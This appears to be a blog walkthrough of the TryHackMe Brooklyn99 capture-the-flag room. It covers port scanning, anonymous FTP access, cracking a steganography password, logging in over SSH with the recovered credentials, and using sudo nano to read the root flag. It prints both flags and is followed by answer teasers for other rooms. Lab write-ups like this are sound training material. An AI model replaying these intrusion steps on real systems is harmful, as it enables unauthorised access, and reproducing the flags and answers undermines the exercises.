Skip to main content

Brooklyn99 CTF

 

Tryhackme - Brooklyn99 CTF

 

NMAP - network mapper

 #nmap -sT -vv -sC -sV 10.10.254.255

PORT   STATE SERVICE REASON  VERSION
21/tcp open  ftp     syn-ack vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0             119 May 17  2020 note_to_jake.txt
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:10.8.192.14
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linuxcol 2.0)
| ssh-hostkey:
|   2048 16:7f:2f:fe:0f:ba:98:77:7d:6d:3e:b6:25:72:c6:a3 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDQjh/Ae6uYU+t7FWTpPoux5Pjv9zvlOLEMn4vD2pYTeHDbzv7ww75UaUzPtsC8kM1EPbMQn1BUCvTNkIxQ34zmw5FatZWNR8/De/u/9fXzHh3K3uQzZaY7XBaDgmU6W0KEmLtKQPcueUomeYkqpL78o5+NjrGO3HwqAH2ED1Zadm5YFEvA0STaqn1G9o4ZHhWi8SJXlIJ6f6O1ea/VqyRJZG1KgbxQFU+zYlIddXpub93zdyMEpwaSIP2P7UTwYRF5r4PQfjAMGkG1mMsOi6v7xCrq/5RlF9ZVJ9nwq349ngG/KTkHtcOJnvXz
|   256 2e:3b:61:59:4b:c4:29:b5:e8:58:39:6f:6f:e9:9b:ee (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABB5hVmiYQ8U3mXta5DX2zOeGJ6WTop8FCSbN1UIeV/9jhAQIiVENAW41IfiBYNj8Bm+WcSDKLaE8
|   256 ab:16:2e:79:20:3c:9b:0a:01:9c:8c:44:26:01:58:04 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIP2hV8Nm+RfR/f2KZ0Ub/OcSrqfY1g4qwsz1k
80/tcp open  http    syn-ack Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_  Supported Methods: OPTIONS HEAD GET POST
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
 

we found the 3 open ports: FTP , SSH and HTTP  

FTP  - File Transfer Protocol

let's check FTP port 21 

 #ftp 10.10.254.255
Connected to 10.10.254.255.
220 (vsFTPd 3.0.3)
Name (10.10.254.255:john): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0             119 May 17  2020 note_to_jake.txt
226 Directory send OK.
ftp> get note_to_jake.txt
local: note_to_jake.txt remote: note_to_jake.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note_to_jake.txt (119 bytes).
226 Transfer complete.
119 bytes received in 0.08 secs (1.4567 kB/s)

HTTP

On HTTP service we found an interesting comment that tells about steganography.

 


 AND,download the image ...
 


 

Steganography 

Let’s extract some info from the image... Agh!! It’s password protected.

 

STEGCRACKER  

Download here github - https://github.com/Paradoxis/StegCracker

let's command for terminal ... 

# stegcracker brooklyn99.jpg

StegCracker 2.1.0 - (https://github.com/Paradoxis/StegCracker)

Copyright (c) 2021 - Luke Paris (Paradoxis)

StegCracker has been retired following the release of StegSeek, which

will blast through the rockyou.txt wordlist within 1.9 second as opposed

to StegCracker which takes ~5 hours.

StegSeek can be found at: https://github.com/RickdeJager/stegseek

No wordlist was specified, using default rockyou.txt wordlist.

Counting lines in wordlist..

Attacking file 'brooklyn99.jpg' with wordlist '/usr/share/wordlists/rockyou.txt'..

Successfully cracked file with password:<'react'>

Tried 20459 passwords

Your file has been written to: brooklyn99.jpg.out

<'react'>

# cat brooklyn99.jpg.out 
Holts Password:
fluffydog12@ninenine
 

Enjoy!!


The hidden text file contains a password...

SSH

#ssh holt@10.10.254.255

holt@brookly_nine_nine:~$ ls
nano.save  user.txt
holt@brookly_nine_nine:~$ cat user.txt
ee11cbb19052e40b07aac0ca060c23ee

USER FLAG - ee11cbb19052e40b07aac0ca060c23ee

 

PRIVILEAGE ESCALATION 

let's check here .. - https://gtfobins.github.io/gtfobins/nano/

HINT - Sudo is a good command. 

Let’s try sudo -l 

holt@brookly_nine_nine:~$ sudo -l
Matching Defaults entries for holt on brookly_nine_nine:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbi\:/snap/bin

User holt may run the following commands on brookly_nine_nine:
    (ALL) NOPASSWD: /bin/nano
 

ROOT FLAG

command - sudo /bin/nano /root/root.txt

 


FLAGS ..

USER FLAG - ee11cbb19052e40b07aac0ca060c23ee

ROOT FLAG - 63a9f0ea7bb98050796b649e85481845

 


Comments

Post a Comment

Popular posts from this blog

Windows Fundamentals 2

 TryHackMe - Windows Fundamentals 2 Task 1 Introduction  #1 :- Read above and start the virtual machine.  Answer :- No Answer Needed Task 2 System Configuration   #2.1 :- What is the name of the service that lists Systems Internals as the manufacturer?  Answer :- PsShutdown #2.2 :- Whom is the Windows license registered to? Answer :- Windows User #2.3 :- What is the command for Windows Troubleshooting? Answer :- C:\Windows\System32\control.exe /name Microsoft.Troubleshooting #2.4 :- What command will open the Control Panel? (The answer is  the name of .exe, not the full path) Answer :- control.exe Task 3 Change UAC Settings  #3 :- What is the command to open User Account Control Settings? (The answer is the name of the .exe file, not the full path)  Answer :- UserAccountControlSettings.exe Task 4 Computer Management  #4.1 :- What is the command to open Computer Management? (The a...
Post a Comment
Read more

Windows Fundamentals 3

 Tryhackme - Windows Fundamentals 3   Task-1 Introduction  #1:- Read the above and start the virtual machine.  Answer:- No Answer Needed Task-2 Windows Updates  #2:- There were two definition updates installed in the attached VM. On what date were these updates installed?  Answer:- 5/3/2021 Task-3 Windows Security  #3:- In the above image, which area needs immediate attention?  Answer:- virus & threat protection Task-4 Virus & threat protection  #4:- Specifically, what is turned off that Windows is notifying you to turn on?  Answer:- Real-time protection Task-5 Firewall & network protection  #5:- If you were connected to airport Wi-Fi, what most likely will be the active firewall profile?  Answer:- public network Task-6 App & browser control  #6:- Read the above.  Answer:- No Answer Needed Task-7 Device security  #7:- What is the TPM?  Answer:- Trusted Platform Module Task-8 BitLocker #8:-...
Post a Comment
Read more

Windows Fundamentals 1

TryhackMe - Windows Fundamentals 1 Task 1 - Introduction to Windows  #1 :- Read above and start the virtual machine.  Answer :- No Answer Needed  Task 2 Windows Editions  #2 :- What encryption can you enable on Pro that you can't enable in Home?  Answer :- BitLocker Task 3 The Desktop (GUI)  #3 :- Which selection will hide/disable the Search box? Answer :- Hidden #3.2 :- Which selection will hide/disable the Task View button? Answer :- Show Task View button #3.3 :- Besides Clock, Volume, and Network, what other icon is visible in the Notification Area? Answer :- Action Center Task 4 The File System  #4 :- What is the meaning of NTFS?  Answer :- New Technology File System Task 5 The Windows\System32 Folders  #5 :- What is the system variable for the Windows folder?  Answer :- %windir% Task 6 User Accounts, Profiles, and Permissions  #6.1 :- What is the name of the other use...
Post a Comment
Read more